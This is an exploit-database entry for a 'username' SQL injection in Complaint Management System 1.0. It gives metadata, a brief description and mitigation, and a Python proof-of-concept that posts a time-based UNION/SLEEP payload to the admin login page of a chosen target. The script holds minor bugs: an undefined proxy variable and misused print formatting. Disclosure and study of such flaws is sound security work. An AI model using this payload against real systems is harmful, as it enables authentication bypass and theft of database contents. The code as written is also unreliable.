Complaint Management System 1.0 - 'username' SQL Injection

vendor:

Complaint Management System

by:

Daniel Ortiz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Complaint Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:complaint_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: XAMPP Version 5.6.40 / Windows 10

2020

Complaint Management System 1.0 – ‘username’ SQL Injection

An SQL injection vulnerability exists in Complaint Management System 1.0, which allows an attacker to inject arbitrary SQL commands via the 'username' parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'username' parameter, in order to bypass authentication or retrieve sensitive data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-05-12
# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:  https://www.sourcecodester.com/php/14206/complaint-management-system.html

#!/usr/bin/python

import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

def main():
    
    target = sys.argv[1]
    payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"
    url = "http://%s/cms/admin/index.php" % target
    
    print("[+] Target: %s") % target
    print("[+] Injecting payload: %s") % payload

    inject(url, payload)

def inject(url, payload):

    s = requests.Session()
    d = {'username': payload, 'password': 'admin', 'submit': ''} 
    r = s.post(url, data=d, proxies=proxy)


if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("(-) usage: %s  TARGET" % sys.argv[0])
        print("(-) e.g: %s  192.168.0.10" % sys.argv[0]) 
        sys.exit(-1)

    main()